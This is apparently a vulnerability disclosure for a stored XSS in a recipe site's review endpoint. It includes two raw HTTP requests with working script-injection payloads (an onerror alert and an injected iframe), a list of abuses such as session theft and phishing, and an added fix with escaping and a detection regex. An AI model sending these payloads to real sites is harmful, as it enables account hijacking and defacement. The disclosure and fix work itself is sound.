greetings, it's bear.
I found a very scary vulnerability.
What can happen if a bad guy finds it:
ddos
xss (leak session id)
html defacement
any javascript execution on user browser
malicious iframe (phishing, clickjacking, more scary stuff)
even more scary stuff
The exploit:
By sending this specific HTTP POST request:
POST /recipe/review HTTP/2
Host: www.recipow.com
Cookie: _ga=GA1.1.58669917.1689302410; sessionId=; _ga_VR9MW6WD01=GS1.1.1689302409.1.1.1689302473.0.0.0
Content-Length: 98
Sec-Ch-Ua:
Sec-Ch-Ua-Platform: ""
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://www.recipow.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.recipow.com/@thomas/recipe-raweggslushie
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{"recipe":"@thomas/recipe-raweggslushie","rating":4.9375,"comment":"<img src/onerror=alert(1)>bb"}
There is an xss attack <img src/onerror=alert(1)>bb. This can be used to steal the session id cookie and log in as other users. :(((
This is because the user-supplied comment is inserted directly into the HTML without being encoded or sanitized, so any markup in it is rendered as-is (very unsafe and scary!!)
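To make the root cause concrete, here is an added example (my own illustration, not recipow's code; the site's real rendering code is not on this page and the function names below are assumptions). It renders a review the unsafe way, the way the report describes, then the fixed way with HTML escaping, and includes a small server-side check that can flag comments containing markup for logging. The sample review is constructed from the first request above.

```javascript
// Added example, not the site's own code. Function names are assumptions.

// Escape the five characters that let text break out of an HTML text node or attribute.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable rendering: the comment string is concatenated straight into the markup,
// which is the behaviour the report describes. An <img onerror=...> in the comment
// becomes a live element in every visitor's browser.
function renderReviewUnsafe(review) {
  return `<div class="review"><span class="rating">${review.rating}</span>` +
    `<p>${review.comment}</p></div>`;
}

// Fixed rendering: every user-controlled value is escaped before insertion,
// so the same payload is shown as literal text and never parsed as a tag.
function renderReviewSafe(review) {
  return `<div class="review"><span class="rating">${escapeHtml(review.rating)}</span>` +
    `<p>${escapeHtml(review.comment)}</p></div>`;
}

// Detection helper (assumed): flags a comment that contains something shaped like an
// HTML tag, so the server can log or alert on it. Escaping is still the actual fix;
// this only makes abuse attempts visible.
function looksLikeMarkup(comment) {
  return /<\s*\/?[a-z][^>]*>/i.test(comment);
}

// Constructed sample: the comment body from the first request in the report.
const sampleReview = {
  recipe: '@thomas/recipe-raweggslushie',
  rating: 4.9375,
  comment: '<img src/onerror=alert(1)>bb',
};

// Stand-alone demo of both renderings.
console.log('unsafe:', renderReviewUnsafe(sampleReview));
console.log('safe:  ', renderReviewSafe(sampleReview));
console.log('flag:  ', looksLikeMarkup(sampleReview.comment));
```

Because the payload is stored with the review and served to anyone who opens the recipe page, escaping at render time (or a proper sanitizer if limited formatting is wanted) is the fix; as defence in depth, marking sessionId as HttpOnly keeps document.cookie from exposing it, and a Content-Security-Policy without inline script blocks the onerror handler even if another injection point is missed.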
Here is an example of executing JavaScript (which also allows injecting potentially malicious iframes):
POST /recipe/review HTTP/2
Host: www.recipow.com
Cookie: _ga=GA1.1.58669917.1689302410; sessionId=dwadawda33t14; _ga_VR9MW6WD01=GS1.1.1689302409.1.1.1689302473.0.0.0
Content-Length: 597
Sec-Ch-Ua:
Sec-Ch-Ua-Platform: ""
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://www.recipow.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.recipow.com/@thomas/recipe-raweggslushie
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{"recipe":"@thomas/recipe-raweggslushie","rating":4.9375,"comment":"<img src/onerror="var youtubeIframe = document.createElement('iframe');youtubeIframe.width = '560';youtubeIframe.height = '315';youtubeIframe.src = 'https://www.youtube.com/embed/yMDOin3yWhU';youtubeIframe.title = 'YouTube video player';youtubeIframe.frameBorder = '0';youtubeIframe.allow = 'accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share';youtubeIframe.allowFullscreen = true;document.getElementsByClassName('w-full my-12')[0].appendChild(youtubeIframe);">clickme"}
This code embeds an iframe into another user's recipe page that shows a YouTube video of bears. Remember this can be used to create a phishing page, show other content, deface the website, or do many other things. Many other scary things!!! (cryptomining?)
I think you got the idea by now. You can also use this JavaScript to force all visitors to create new recipes with hundreds of images and send XSS attacks from the victims' browsers, and it can be very bad. Very scary.
Summary:
The exploit allows any user to abuse reflected XSS to execute JavaScript in a victim's browser. (very scary)